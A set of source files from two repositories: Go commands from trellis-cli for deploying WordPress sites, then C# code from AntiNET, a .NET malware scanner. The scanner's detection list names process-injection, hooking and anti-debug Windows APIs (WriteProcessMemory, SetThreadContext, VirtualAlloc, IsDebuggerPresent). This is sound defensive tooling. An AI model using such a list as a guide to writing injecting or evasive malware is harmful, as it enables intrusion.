if !c.Trellis.Virtualenv.Initialized() {
spinner := NewSpinner(
SpinnerCfg{
Message: "Creating virtualenv",
FailMessage: "Error creating virtualenv",
StopMessage: fmt.Sprintf("Created virtualenv (%s)", c.Trellis.Virtualenv.Path),
},
)
spinner.Start()
err := c.Trellis.Virtualenv.Create()
if err != nil {
spinner.StopFail()
c.UI.Error(err.Error())
return 1
}
c.Trellis.VenvInitialized = true
spinner.Stop()
}
spinner := NewSpinner(
SpinnerCfg{
Message: "Installing dependencies (this can take a minute...)",
FailMessage: "Error installing dependencies",
StopMessage: "Installing dependencies",
},
)
spinner.Start()
pipCmd := exec.Command("pip", "install", "-r", "requirements.txt")
errorOutput := &bytes.Buffer{}
pipCmd.Stderr = errorOutput
err := pipCmd.Run()
if err != nil {
spinner.StopFail()
c.UI.Error(errorOutput.String())
return 1
}
spinner.Stop()
return 0
}
func (c *InitCommand) Synopsis() string {
return "Initializes an existing Trellis project"
}
func (c *InitCommand) Help() string {
helpText := `
Usage: trellis init [options]
Initializes an existing Trellis project to be managed by trellis-cli.
The initialization process does two things:
1. installs virtualenv if necessary (see below for details)
2. creates a virtual environment specific to the project to manage dependencies
3. installs dependencies via pip (specified by requirements.txt in your Trellis project)
trellis-cli will attempt to use an already installed method to manage virtualenvs
and only fallback to installing virtualenv if necessary:
1. if python3 is installed, use built-in virtualenv feature
2. use virtualenv command if available
3. finally install virtualenv at $HOME/.trellis/virtualenv
To learn more about virtual environments, see https://docs.python.org/3/tutorial/venv.html
This command is idempotent meaning it can be run multiple times without side-effects.
$ trellis init
Force initialization by re-creating the existing virtualenv
$ trellis init --force
Options:
--force Force init by re-creating the virtualenv
-h, --help show this help
`
return strings.TrimSpace(helpText)
}
<|start_filename|>cmd/spinner.go<|end_filename|>
package cmd
import (
"time"
"github.com/theckman/yacspin"
)
type SpinnerCfg struct {
Message string
FailMessage string
StopMessage string
}
func NewSpinner(config SpinnerCfg) *yacspin.Spinner {
if config.StopMessage == "" {
config.StopMessage = config.Message
}
cfg := yacspin.Config{
Frequency: 100 * time.Millisecond,
CharSet: yacspin.CharSets[14],
Suffix: " ",
Message: config.Message,
SuffixAutoColon: false,
StopCharacter: "✓",
StopColors: []string{"fgGreen"},
StopMessage: config.StopMessage,
StopFailCharacter: "✘",
StopFailColors: []string{"fgRed"},
StopFailMessage: config.FailMessage,
}
spinner, _ := yacspin.New(cfg)
return spinner
}
<|start_filename|>cmd/deploy.go<|end_filename|>
package cmd
import (
"flag"
"fmt"
"strings"
"github.com/mitchellh/cli"
"github.com/posener/complete"
"github.com/roots/trellis-cli/trellis"
)
func NewDeployCommand(ui cli.Ui, trellis *trellis.Trellis) *DeployCommand {
c := &DeployCommand{UI: ui, Trellis: trellis, playbook: &Playbook{ui: ui}}
c.init()
return c
}
type DeployCommand struct {
UI cli.Ui
flags *flag.FlagSet
branch string
extraVars string
Trellis *trellis.Trellis
playbook PlaybookRunner
verbose bool
}
func (c *DeployCommand) init() {
c.flags = flag.NewFlagSet("", flag.ContinueOnError)
c.flags.Usage = func() { c.UI.Info(c.Help()) }
c.flags.StringVar(&c.branch, "branch", "", "Optional git branch to deploy which overrides the branch set in your site config (default: master)")
c.flags.StringVar(&c.extraVars, "extra-vars", "", "Additional variables which are passed through to Ansible as 'extra-vars'")
c.flags.BoolVar(&c.verbose, "verbose", false, "Enable Ansible's verbose mode")
}
func (c *DeployCommand) Run(args []string) int {
if err := c.Trellis.LoadProject(); err != nil {
c.UI.Error(err.Error())
return 1
}
c.Trellis.CheckVirtualenv(c.UI)
if err := c.flags.Parse(args); err != nil {
return 1
}
args = c.flags.Args()
commandArgumentValidator := &CommandArgumentValidator{required: 1, optional: 1}
commandArgumentErr := commandArgumentValidator.validate(args)
if commandArgumentErr != nil {
c.UI.Error(commandArgumentErr.Error())
c.UI.Output(c.Help())
return 1
}
environment := args[0]
environmentErr := c.Trellis.ValidateEnvironment(environment)
if environmentErr != nil {
c.UI.Error(environmentErr.Error())
return 1
}
siteNameArg := c.flags.Arg(1)
siteName, siteNameErr := c.Trellis.FindSiteNameFromEnvironment(environment, siteNameArg)
if siteNameErr != nil {
c.UI.Error(siteNameErr.Error())
return 1
}
vars := []string{
fmt.Sprintf("env=%s", environment),
fmt.Sprintf("site=%s", siteName),
}
if c.verbose {
vars = append(vars, "-vvvv")
}
if c.branch != "" {
vars = append(vars, fmt.Sprintf("branch=%s", c.branch))
}
if c.extraVars != "" {
vars = append(vars, c.extraVars)
}
extraVars := strings.Join(vars, " ")
c.playbook.SetRoot(c.Trellis.Path)
if err := c.playbook.Run("deploy.yml", []string{"-e", extraVars}); err != nil {
c.UI.Error(err.Error())
return 1
}
return 0
}
func (c *DeployCommand) Synopsis() string {
return "Deploys a site to the specified environment"
}
func (c *DeployCommand) Help() string {
helpText := `
Usage: trellis deploy [options] ENVIRONMENT [SITE]
Deploys a site to the specified environment.
See https://roots.io/trellis/docs/deploys/ for more information on deploys with Trellis.
Deploy the default site to production:
$ trellis deploy production
Deploy example.com site to production:
$ trellis deploy production example.com
Deploy a site to staging with a different git branch:
$ trellis deploy --branch=feature-123 production example.com
Arguments:
ENVIRONMENT Name of environment (ie: production)
SITE Name of the site (ie: example.com)
Options:
--branch Optional git branch to deploy which overrides the branch set in your site config (default: master)
--extra-vars (multiple) set additional variables as key=value or YAML/JSON, if filename prepend with @
--verbose Enable Ansible's verbose mode
-h, --help show this help
`
return strings.TrimSpace(helpText)
}
func (c *DeployCommand) AutocompleteArgs() complete.Predictor {
return c.Trellis.AutocompleteSite()
}
func (c *DeployCommand) AutocompleteFlags() complete.Flags {
return complete.Flags{
"--branch": complete.PredictNothing,
"--extra-vars": complete.PredictNothing,
"--verbose": complete.PredictNothing,
}
}
<|start_filename|>trellis/complete_test.go<|end_filename|>
package trellis
import (
"bytes"
"io"
"os"
"reflect"
"sort"
"strings"
"testing"
"github.com/mitchellh/cli"
"github.com/posener/complete"
)
// Tests based on
// https://github.com/mitchellh/cli/blob/5454ffe87bc5c6d8b6b21c825617755e18a07828/cli_test.go#L1125-L1225
// envComplete is the env var that the complete library sets to specify
// it should be calculating an auto-completion.
const envComplete = "COMP_LINE"
func TestCompletionFunctions(t *testing.T) {
trellis := NewTrellis()
defer TestChdir(t, "testdata/trellis")()
if err := trellis.LoadProject(); err != nil {
t.Fatalf(err.Error())
}
cases := []struct {
Predictor complete.Predictor
Completed []string
Last string
Expected []string
}{
{trellis.AutocompleteEnvironment(), []string{"deploy"}, "", []string{"development", "valet-link", "production"}},
{trellis.AutocompleteEnvironment(), []string{"deploy"}, "d", []string{"development"}},
{trellis.AutocompleteEnvironment(), []string{"deploy", "production"}, "", nil},
{trellis.AutocompleteSite(), []string{"deploy"}, "", []string{"development", "valet-link", "production"}},
{trellis.AutocompleteSite(), []string{"deploy"}, "d", []string{"development"}},
{trellis.AutocompleteSite(), []string{"deploy", "production"}, "", []string{"example.com"}},
}
for _, tc := range cases {
t.Run(tc.Last, func(t *testing.T) {
command := new(cli.MockCommandAutocomplete)
command.AutocompleteArgsValue = tc.Predictor
cli := &cli.CLI{
Commands: map[string]cli.CommandFactory{
"deploy": func() (cli.Command, error) { return command, nil },
},
Autocomplete: true,
}
// Setup the autocomplete line
var input bytes.Buffer
input.WriteString("cli ")
if len(tc.Completed) > 0 {
input.WriteString(strings.Join(tc.Completed, " "))
input.WriteString(" ")
}
input.WriteString(tc.Last)
defer testAutocomplete(t, input.String())()
// Setup the output so that we can read it. We don't need to
// reset os.Stdout because testAutocomplete will do that for us.
r, w, err := os.Pipe()
if err != nil {
t.Fatalf("err: %s", err)
}
defer r.Close() // Only defer reader since writer is closed below
os.Stdout = w
// Run
exitCode, err := cli.Run()
w.Close()
if err != nil {
t.Fatalf("err: %s", err)
}
if exitCode != 0 {
t.Fatalf("bad: %d", exitCode)
}
// Copy the output and get the autocompletions. We trim the last
// element if we have one since we usually output a final newline
// which results in a blank.
var outBuf bytes.Buffer
io.Copy(&outBuf, r)
actual := strings.Split(outBuf.String(), "\n")
if len(actual) > 0 {
actual = actual[:len(actual)-1]
}
if len(actual) == 0 {
// If we have no elements left, make the value nil since
// this is what we use in tests.
actual = nil
}
sort.Strings(actual)
sort.Strings(tc.Expected)
if !reflect.DeepEqual(actual, tc.Expected) {
t.Fatalf("bad:\n\n%#v\n\n%#v", actual, tc.Expected)
}
})
}
}
// testAutocomplete sets up the environment to behave like a <tab> was
// pressed in a shell to autocomplete a command.
func testAutocomplete(t *testing.T, input string) func() {
// This env var is used to trigger autocomplete
os.Setenv(envComplete, input)
// Change stdout/stderr since the autocompleter writes directly to them.
oldStdout := os.Stdout
oldStderr := os.Stderr
r, w, err := os.Pipe()
if err != nil {
t.Fatalf("err: %s", err)
}
os.Stdout = w
os.Stderr = w
return func() {
// Reset our env
os.Unsetenv(envComplete)
// Reset stdout, stderr
os.Stdout = oldStdout
os.Stderr = oldStderr
// Close our pipe
r.Close()
w.Close()
}
}
<|start_filename|>cmd/rollback.go<|end_filename|>
package cmd
import (
"flag"
"fmt"
"strings"
"github.com/mitchellh/cli"
"github.com/posener/complete"
"github.com/roots/trellis-cli/trellis"
)
func NewRollbackCommand(ui cli.Ui, trellis *trellis.Trellis) *RollbackCommand {
c := &RollbackCommand{UI: ui, Trellis: trellis, playbook: &Playbook{ui: ui}}
c.init()
return c
}
type RollbackCommand struct {
UI cli.Ui
flags *flag.FlagSet
release string
Trellis *trellis.Trellis
playbook PlaybookRunner
verbose bool
}
func (c *RollbackCommand) init() {
c.flags = flag.NewFlagSet("", flag.ContinueOnError)
c.flags.Usage = func() { c.UI.Info(c.Help()) }
c.flags.StringVar(&c.release, "release", "", "Release to rollback instead of latest one")
c.flags.BoolVar(&c.verbose, "verbose", false, "Enable Ansible's verbose mode")
}
func (c *RollbackCommand) Run(args []string) int {
if err := c.Trellis.LoadProject(); err != nil {
c.UI.Error(err.Error())
return 1
}
c.Trellis.CheckVirtualenv(c.UI)
if err := c.flags.Parse(args); err != nil {
return 1
}
args = c.flags.Args()
commandArgumentValidator := &CommandArgumentValidator{required: 1, optional: 1}
commandArgumentErr := commandArgumentValidator.validate(args)
if commandArgumentErr != nil {
c.UI.Error(commandArgumentErr.Error())
c.UI.Output(c.Help())
return 1
}
environment := args[0]
environmentErr := c.Trellis.ValidateEnvironment(environment)
if environmentErr != nil {
c.UI.Error(environmentErr.Error())
return 1
}
siteNameArg := c.flags.Arg(1)
siteName, siteNameErr := c.Trellis.FindSiteNameFromEnvironment(environment, siteNameArg)
if siteNameErr != nil {
c.UI.Error(siteNameErr.Error())
return 1
}
extraVars := fmt.Sprintf("env=%s site=%s", environment, siteName)
if len(c.release) > 0 {
extraVars = fmt.Sprintf("%s release=%s", extraVars, c.release)
}
playbookArgs := []string{"-e", extraVars}
if c.verbose {
playbookArgs = append(playbookArgs, "-vvvv")
}
c.playbook.SetRoot(c.Trellis.Path)
if err := c.playbook.Run("rollback.yml", playbookArgs); err != nil {
c.UI.Error(err.Error())
return 1
}
return 0
}
func (c *RollbackCommand) Synopsis() string {
return "Rollback the last deploy of the site on the specified environment"
}
func (c *RollbackCommand) Help() string {
helpText := `
Usage: trellis rollback [options] ENVIRONMENT [SITE]
Performs a rollback (revert) of the last deploy for the site specified.
Rollback the latest deploy on the default site:
$ trellis rollback production
Rollback the latest deploy for a specific site:
$ trellis rollback production example.com
Rollback a specific release:
$ trellis rollback --release=12345678901234 production example.com
Arguments:
ENVIRONMENT Name of environment (ie: production)
SITE Name of the site (ie: example.com)
Options:
--release Name of release to rollback instead of latest
--verbose Enable Ansible's verbose mode
-h, --help show this help
`
return strings.TrimSpace(helpText)
}
func (c *RollbackCommand) AutocompleteArgs() complete.Predictor {
return c.Trellis.AutocompleteSite()
}
func (c *RollbackCommand) AutocompleteFlags() complete.Flags {
return complete.Flags{
"--release": complete.PredictNothing,
"--verbose": complete.PredictNothing,
}
}
<|start_filename|>cmd/cmd_test.go<|end_filename|>
package cmd
import (
"fmt"
"os"
"os/exec"
"strings"
"testing"
"github.com/mitchellh/cli"
)
func mockExecCommand(command string, args []string, ui cli.Ui) *exec.Cmd {
cs := []string{"-test.run=TestHelperProcess", "--", command}
cs = append(cs, args...)
cmd := exec.Command(os.Args[0], cs...)
cmd.Stderr = &UiErrorWriter{ui}
cmd.Stdout = &cli.UiWriter{ui}
cmd.Env = []string{"GO_WANT_HELPER_PROCESS=1"}
return cmd
}
func MockExec(t *testing.T) func() {
t.Helper()
execCommandWithOutput = mockExecCommand
execCommand = mockExecCommand
return func() {
execCommandWithOutput = CommandExecWithOutput
execCommand = CommandExec
}
}
func TestHelperProcess(t *testing.T) {
if os.Getenv("GO_WANT_HELPER_PROCESS") != "1" {
return
}
fmt.Fprintf(os.Stdout, strings.Join(os.Args[3:], " "))
os.Exit(0)
}
type MockCommand struct {
cmd string
args string
env []string
}
<|start_filename|>trellis/complete.go<|end_filename|>
package trellis
import (
"github.com/posener/complete"
)
func (t *Trellis) AutocompleteSite() complete.Predictor {
return t.PredictSite()
}
func (t *Trellis) AutocompleteEnvironment() complete.Predictor {
return t.PredictEnvironment()
}
func (t *Trellis) PredictSite() complete.PredictFunc {
return func(args complete.Args) []string {
if err := t.LoadProject(); err != nil {
return []string{}
}
switch len(args.Completed) {
case 0:
return t.EnvironmentNames()
case 1:
return t.SiteNamesFromEnvironment(args.LastCompleted)
default:
return []string{}
}
}
}
func (t *Trellis) PredictEnvironment() complete.PredictFunc {
return func(args complete.Args) []string {
if err := t.LoadProject(); err != nil {
return []string{}
}
switch len(args.Completed) {
case 0:
return t.EnvironmentNames()
default:
return []string{}
}
}
}
<|start_filename|>cmd/alias.go<|end_filename|>
package cmd
import (
_ "embed"
"flag"
"fmt"
"github.com/fatih/color"
"github.com/mitchellh/cli"
"github.com/posener/complete"
"github.com/roots/trellis-cli/trellis"
"io/ioutil"
"os"
"path/filepath"
"strings"
)
type AliasCommand struct {
UI cli.Ui
flags *flag.FlagSet
Trellis *trellis.Trellis
local string
aliasPlaybook PlaybookRunner
aliasCopyPlaybook PlaybookRunner
}
//go:embed files/playbooks/alias.yml
var aliasYml string
const aliasYmlJ2 = `
@{{ env }}:
ssh: "{{ web_user }}@{{ ansible_host }}:{{ ansible_port | default('22') }}"
path: "{{ project_root | default(www_root + '/' + item.key) | regex_replace('^~\/','') }}/{{ item.current_path | default('current') }}/web/wp"
`
//go:embed files/playbooks/alias_copy.yml
var aliasCopyYml string
func NewAliasCommand(ui cli.Ui, trellis *trellis.Trellis) *AliasCommand {
aliasPlaybook := &AdHocPlaybook{
files: map[string]string{
"alias.yml": aliasYml,
"alias.yml.j2": strings.TrimSpace(aliasYmlJ2) + "\n",
},
Playbook: Playbook{
ui: ui,
},
}
aliasCopyPlaybook := &AdHocPlaybook{
files: map[string]string{
"alias-copy.yml": aliasCopyYml,
},
Playbook: Playbook{
ui: ui,
},
}
c := &AliasCommand{UI: ui, Trellis: trellis, aliasPlaybook: aliasPlaybook, aliasCopyPlaybook: aliasCopyPlaybook}
c.init()
return c
}
func (c *AliasCommand) init() {
c.flags = flag.NewFlagSet("", flag.ContinueOnError)
c.flags.Usage = func() { c.UI.Info(c.Help()) }
c.flags.StringVar(&c.local, "local", "development", "local environment name, default: development")
}
func (c *AliasCommand) Run(args []string) int {
if err := c.Trellis.LoadProject(); err != nil {
c.UI.Error(err.Error())
return 1
}
if err := c.flags.Parse(args); err != nil {
return 1
}
args = c.flags.Args()
commandArgumentValidator := &CommandArgumentValidator{required: 0, optional: 0}
commandArgumentErr := commandArgumentValidator.validate(args)
if commandArgumentErr != nil {
c.UI.Error(commandArgumentErr.Error())
c.UI.Output(c.Help())
return 1
}
environments := c.Trellis.EnvironmentNames()
var remoteEnvironments []string
for _, environment := range environments {
if environment != c.local {
remoteEnvironments = append(remoteEnvironments, environment)
}
}
tempDir, tempDirErr := ioutil.TempDir("", "trellis-alias-")
if tempDirErr != nil {
c.UI.Error(tempDirErr.Error())
return 1
}
defer os.RemoveAll(tempDir)
c.aliasPlaybook.SetRoot(c.Trellis.Path)
for _, environment := range remoteEnvironments {
args := []string{
"-vvv",
"-e", "env=" + environment,
"-e", "trellis_alias_j2=alias.yml.j2",
"-e", "trellis_alias_temp_dir=" + tempDir,
}
if err := c.aliasPlaybook.Run("alias.yml", args); err != nil {
c.UI.Error(fmt.Sprintf("Error running ansible-playbook alias.yml: %s", err))
return 1
}
}
combined := ""
for _, environment := range remoteEnvironments {
part, err := ioutil.ReadFile(filepath.Join(tempDir, environment+".yml.part"))
if err != nil {
c.UI.Error(err.Error())
return 1
}
combined = combined + string(part)
}
combinedYmlPath := filepath.Join(tempDir, "/combined.yml")
writeFileErr := ioutil.WriteFile(combinedYmlPath, []byte(combined), 0644)
if writeFileErr != nil {
c.UI.Error(writeFileErr.Error())
return 1
}
c.aliasCopyPlaybook.SetRoot(c.Trellis.Path)
if err := c.aliasCopyPlaybook.Run("alias-copy.yml", []string{"-e", "env=" + c.local, "-e", "trellis_alias_combined=" + combinedYmlPath}); err != nil {
c.UI.Error(fmt.Sprintf("Error running ansible-playbook alias-copy.yml: %s", err))
return 1
}
c.UI.Info(color.GreenString("✓ wp-cli.trellis-alias.yml generated"))
message := `
Action Required: Add these lines into wp-cli.yml or wp-cli.local.yml
_:
inherit: wp-cli.trellis-alias.yml
`
c.UI.Info(strings.TrimSpace(message))
return 0
}
func (c *AliasCommand) Synopsis() string {
return "Generate WP CLI aliases for remote environments"
}
func (c *AliasCommand) Help() string {
helpText := `
Usage: trellis alias [options]
Generate WP CLI aliases for remote environments
Options:
--local (default: development) Local environment name
-h, --help show this help
`
return strings.TrimSpace(helpText)
}
func (c *AliasCommand) AutocompleteFlags() complete.Flags {
return complete.Flags{
"--local": complete.PredictNothing,
}
}
| roots/trellis-cl |
<|start_filename|>AntiNETCLI/Program.cs<|end_filename|>
using AntiNET2;
using AntiNET2.Core.Models;
using AntiNET2.Core.Models.Database;
using AntiNET2.Core.Providers;
using AntiNET2.Core.Providers.Database;
using AntiNET2.Core.Providers.DetectionEngines.Managed;
using AntiNET2.Core.Providers.DetectionEngines.Native;
using dnlib.DotNet;
using dnlib.PE;
using System;
using System.Collections.Generic;
using System.Diagnostics;
using System.Linq;
using System.Text;
using System.Threading.Tasks;
namespace AntiNETCLI
{
class Program
{
static void Main(string[] args)
{
Stopwatch sw = new Stopwatch();
Console.Title = "AntiNET - \"False positive? Never!!1\"";
// Trigger the db loading because it'll be counted in the time otherwise :s
if (AntiNET2.Core.Providers.Database.DetectionDatabase.Calls == null)
{
}
//AddDets();
int totalDetections = 0;
sw.Start();
List<Detection> TotalDetections = Scanner.Scan(args[0], out totalDetections);
sw.Stop();
Console.WriteLine("Total Detection: {0}", totalDetections);
/*var grouped = TotalDetections.GroupBy(x => x.DetectionType).ToDictionary(x => x.Key);
foreach (var pair in grouped)
{
foreach (var x in pair.Value)
{
x.DetectionReasons.ForEach(y => Console.WriteLine(y));
}
}*/
// When you try to code, but can't, and then try half linq it...
// :'(
var grouped = TotalDetections.GroupBy(x => x.DetectionType).ToDictionary(x => x.Key);
foreach (var pair in grouped)
{
foreach (var x in pair.Value)
{
var z = x.DetectionReasons.GroupBy(a => a.ReasonType).ToDictionary(a => a.Key);
foreach (var p2 in z)
{
Console.WriteLine(p2.Key);
Dictionary<string, int> counts = new Dictionary<string, int>();
foreach (var x2 in p2.Value)
{
if (counts.ContainsKey(x2.Message))
{
counts[x2.Message]++;
}
else
{
counts.Add(x2.Message, 1);
}
}
foreach (var b in counts)
{
Console.WriteLine("\t{0}x {1}", b.Value, b.Key);
}
}
}
}
Console.WriteLine("Total time taken for scanning: {0}", sw.Elapsed.TotalSeconds);
Console.ReadKey();
}
static void AddDets()
{
PInvokeEntry p = new PInvokeEntry()
{
Category = "Dynamic Calls",
Description = "Get Process Address",
Trigger = "GetProcAddress",
Tag = "DynCalls"
};
DetectionDatabase.AddDetection(p);
p = new PInvokeEntry()
{
Category = "Memory",
Description = "Read Process Memory",
Trigger = "ReadProcessMemory",
Tag = "Mem"
};
DetectionDatabase.AddDetection(p);
p = new PInvokeEntry()
{
Category = "Memory",
Description = "Write Process Memory",
Trigger = "WriteProcessMemory",
Tag = "Mem"
};
DetectionDatabase.AddDetection(p);
p = new PInvokeEntry()
{
Category = "Thread",
Description = "Resume Thread",
Trigger = "ResumeThread",
Tag = "Threads"
};
DetectionDatabase.AddDetection(p);
p = new PInvokeEntry()
{
Category = "Process",
Description = "Create new process",
Trigger = "CreateProcess",
Tag = "Procs"
};
DetectionDatabase.AddDetection(p);
p = new PInvokeEntry()
{
Category = "Process",
Description = "Open process",
Trigger = "OpenProcess",
Tag = "Procs"
};
DetectionDatabase.AddDetection(p);
p = new PInvokeEntry()
{
Category = "Memory",
Description = "Protect Memory",
Trigger = "VirtualProtect",
Tag = "Mem"
};
DetectionDatabase.AddDetection(p);
p = new PInvokeEntry()
{
Category = "Memory",
Description = "Allocate Memory",
Trigger = "VirtualAlloc",
Tag = "Mem"
};
DetectionDatabase.AddDetection(p);
p = new PInvokeEntry()
{
Category = "Process",
Description = "Terminate process",
Trigger = "TerminateProcess",
Tag = "Procs"
};
DetectionDatabase.AddDetection(p);
p = new PInvokeEntry()
{
Category = "Anti-Debug",
Description = "Output to debugger",
Trigger = "OutputDebugString",
Tag = "Debug"
};
DetectionDatabase.AddDetection(p);
p = new PInvokeEntry()
{
Category = "Anti-Debug",
Description = "Check if debugger present",
Trigger = "IsDebuggerPresent",
Tag = "Debug"
};
DetectionDatabase.AddDetection(p);
p = new PInvokeEntry()
{
Category = "Process",
Description = "Set Critical Process",
Trigger = "RtlSetProcessIsCritical",
Tag = "Procs"
};
DetectionDatabase.AddDetection(p);
p = new PInvokeEntry()
{
Category = "Dynamic Calls",
Description = "Load External Library",
Trigger = "LoadLibrary",
Tag = "DynCalls"
};
DetectionDatabase.AddDetection(p);
p = new PInvokeEntry()
{
Category = "Thread",
Description = "Set thread context",
Trigger = "SetThreadContext",
Tag = "Threads"
};
DetectionDatabase.AddDetection(p);
p = new PInvokeEntry()
{
Category = "Thread",
Description = "Set thread context x64",
Trigger = "Wow64SetThreadContext",
Tag = "Threads"
};
DetectionDatabase.AddDetection(p);
p = new PInvokeEntry()
{
Category = "Hook",
Description = "Low level Windows Hook",
Trigger = "SetWindowsHook",
Tag = "Hooks"
};
DetectionDatabase.AddDetection(p);
ReflectionEntry r = new ReflectionEntry()
{
Trigger = "System.AppDomain::Load",
Description = "Loading Assembly (Appdomain)",
Category = "Load",
Tag = "Load"
};
DetectionDatabase.AddDetection(r);
r = new ReflectionEntry()
{
Trigger = "System.Reflection.Assembly::Load",
Description = "Loading Assembly",
Category = "Load",
Tag = "Load"
};
DetectionDatabase.AddDetection(r);
r = new ReflectionEntry()
{
Trigger = "System.Runtime.CompilerServices.RuntimeHelpers",
Description = "Loading Assembly by Invoke (RuntimeHelpers)",
Category = "Load",
Tag = "Load"
};
DetectionDatabase.AddDetection(r);
r = new ReflectionEntry()
{
Trigger = "System.Reflection.Assembly::get_EntryPoint",
Description = "Getting Assembly EntryPoint",
Category = "Invoke",
Tag = "Invoke"
};
DetectionDatabase.AddDetection(r);
r = new ReflectionEntry()
{
Trigger = "System.Reflection.MethodBase::Invoke",
Description = "Invoking method with MethodBase",
Category = "Invoke",
Tag = "Invoke"
};
DetectionDatabase.AddDetection(r);
r = new ReflectionEntry()
{
Trigger = "System.Type::InvokeMember",
Description = "Invoking method with Type.InvokeMember",
Category = "Invoke",
Tag = "Invoke"
};
DetectionDatabase.AddDetection(r);
r = new ReflectionEntry()
{
Trigger = "Microsoft.VisualBasic.CompilerServices.NewLateBinding::",
Description = "Late binding to invoke data",
Category = "Invoke",
Tag = "Invoke"
};
DetectionDatabase.AddDetection(r);
r = new ReflectionEntry()
{
Trigger = "Microsoft.VisualBasic.CompilerServices.Operators::OrObject",
Description = "Or Object is used with NewLateBinding",
Category = "Invoke",
Tag = "Invoke"
};
DetectionDatabase.AddDetection(r);
r = new ReflectionEntry()
{
Trigger = "System.Reflection.Module::ResolveSignature",
Description = "Resolve signature to byte array (store data)",
Category = "Resources",
Tag = "Resources"
};
DetectionDatabase.AddDetection(r);
r = new ReflectionEntry()
{
Trigger = "System.Reflection.Module::ResolveMethod",
Description = "Resolve a method from MD Token",
Category = "Invoke",
Tag = "Invoke"
};
DetectionDatabase.AddDetection(r);
r = new ReflectionEntry()
{
Trigger = "System.Type::GetMethod",
Description = "Gets Method(s) from a type",
Category = "Invoke",
Tag = "Invoke"
};
DetectionDatabase.AddDetection(r);
r = new ReflectionEntry()
{
Trigger = "System.Module::GetTypes",
Description = "Gets Type(s) from a Module",
Category = "Invoke",
Tag = "Invoke"
};
DetectionDatabase.AddDetection(r);
r = new ReflectionEntry()
{
Trigger = "System.Reflection.Emit.OpCodes",
Description = "Initializing CIL related data",
Category = "Dynamic",
Tag = "Dynamic"
};
DetectionDatabase.AddDetection(r);
r = new ReflectionEntry()
{
Trigger = "System.Reflection.Emit.ILGenerator",
Description = "Using IL Generator",
Category = "Dynamic",
Tag = "Dynamic"
};
DetectionDatabase.AddDetection(r);
r = new ReflectionEntry()
{
Trigger = "System.Runtime.InteropServices.Marshal::Alloc",
Description = "Marshal Memory Allocation",
Category = "Dynamic",
Tag = "Dynamic"
};
DetectionDatabase.AddDetection(r);
r = new ReflectionEntry()
{
Trigger = "System.Runtime.InteropServices.GCHandle::Alloc",
Description = "GC Handle Allocation",
Category = "Dynamic",
Tag = "Dynamic"
};
DetectionDatabase.AddDetection(r);
r = new ReflectionEntry()
{
Trigger = "System.Resources.ResourceManager::.ctor",
Description = "Initializing ResourceManager",
Category = "Resources",
Tag = "Resources"
};
DetectionDatabase.AddDetection(r);
r = new ReflectionEntry()
{
Trigger = "System.Resources.ResourceManager::GetObject",
Description = "Getting Object from Resource Manager",
Category = "Resources",
Tag = "Resources"
};
DetectionDatabase.AddDetection(r);
r = new ReflectionEntry()
{
Trigger = "System.Reflection.Assembly::GetManifestResource",
Description = "Getting Resource from Assembly",
Category = "Resources",
Tag = "Resources"
};
DetectionDatabase.AddDetection(r);
r = new ReflectionEntry()
{
Trigger = "System.Reflection.Assembly::GetManifestResource",
Description = "Getting Resource from Assembly",
Category = "Resources",
Tag = "Resources"
};
DetectionDatabase.AddDetection(r);
r = new ReflectionEntry()
{
Trigger = "System.Reflection.Assembly::GetManifestResourceNames",
Description = "Getting Resource Names from Assembly",
Category = "Resources",
Tag = "Resources"
};
DetectionDatabase.AddDetection(r);
}
}
}
<|start_filename|>AntiNET2/Core/Models/AssemblySettings.cs<|end_filename|>
using dnlib.DotNet;
using dnlib.PE;
using System;
using System.Collections.Generic;
using System.Linq;
using System.Text;
using System.Threading.Tasks;
namespace AntiNET2.Core.Models
{
public class AssemblySettings
{
public ModuleDefMD Module { get; set; }
public PEImage NativeImage { get; set; }
public List<Detection> TotalDetections { get; set; } = new List<Detection>();
public void AddDetection(string type, Reason r)
{
var typeDetection = TotalDetections.Where(x => x.DetectionType == type).FirstOrDefault();
if (typeDetection == null)
{
TotalDetections.Add(new Detection() { DetectionType = type, DetectionReasons = new List<Reason>() { r }, TotalDetections = 1 });
}
else
{
typeDetection.DetectionReasons.Add(r);
typeDetection.TotalDetections++;
}
}
}
}
<|start_filename|>AntiNET2/Core/Extensions/ModuleExtensions.cs<|end_filename|>
using System;
using System.Collections.Generic;
using System.Linq;
using System.Text;
using System.Threading.Tasks;
namespace AntiNET2.Core.Extensions
{
class ModuleExtensions
{
}
}
<|start_filename|>AntiNET2/Core/Models/Reason.cs<|end_filename|>
using System;
using System.Collections.Generic;
using System.Linq;
using System.Text;
using System.Threading.Tasks;
namespace AntiNET2.Core.Models
{
public class Reason
{
public string ReasonType { get; }
public string Message { get; }
public Reason(string type, string msg)
{
ReasonType = type;
Message = msg;
}
public override string ToString()
{
return string.Format("{0} - {1}", ReasonType, Message);
}
}
}
<|start_filename|>AntiNET2/Core/Extensions/ByteArrayExtensions.cs<|end_filename|>
using AntiNET2.Core.Helpers;
using AntiNET2.Core.Models;
using System;
using System.Collections.Generic;
using System.Linq;
using System.Text;
using System.Threading.Tasks;
namespace AntiNET2.Core.Extensions
{
public static class ByteArrayExtensions
{
public static int SigDetection(this byte[] array, AssemblySettings _asm, string type)
{
string singular = type;
if (type.EndsWith("s"))
{
singular = type.Remove(type.Length - 2);
}
int d = 0;
// GZip
if (array[0] == 0x1f && array[1] == 0x8b)
{
_asm.AddDetection(type, new Reason(type, singular + " has GZip magic number. Could be malicious packed content."));
d++;
}
// Pkzip .zip
if (array[0] == 0x50 && array[1] == 0x4b && array[2] == 0x03 && array[3] == 0x04)
{
_asm.AddDetection(type, new Reason(type, singular + " has PKZip magic number. Could be malicious packed content."));
d++;
}
// Rar
if (array[0] == 0x52 && array[1] == 0x61 && array[2] == 0x72 && array[3] == 0x21 && array[4] == 0x1A && array[5] == 0x07 && array[6] == 0x00)
{
_asm.AddDetection(type, new Reason(type, singular + " has RAR magic number. Could be malicious packed content."));
d++;
}
// Exe
if (array[0] == 0x4D && array[1] == 0x5A)
{
_asm.AddDetection(type, new Reason(type, singular + " has EXE magic number. Could be malicious content."));
d++;
}
return d;
}
public static long IndexOf(this byte[] file, string sig)
{
return ByteScan.GetIndexOfSig(file, sig);
}
#region Testing Index Of
public static unsafe long IndexOf(this byte[] haystack, byte[] needle, long startOffset = 0)
{
fixed (byte* h = haystack) fixed (byte* n = needle)
{
for (byte* hNext = h + startOffset, hEnd = h + haystack.LongLength + 1 - needle.LongLength, nEnd = n + needle.LongLength; hNext < hEnd; hNext++)
for (byte* hInc = hNext, nInc = n; *nInc == *hInc; hInc++)
if (++nInc == nEnd)
return hNext - h;
return -1;
}
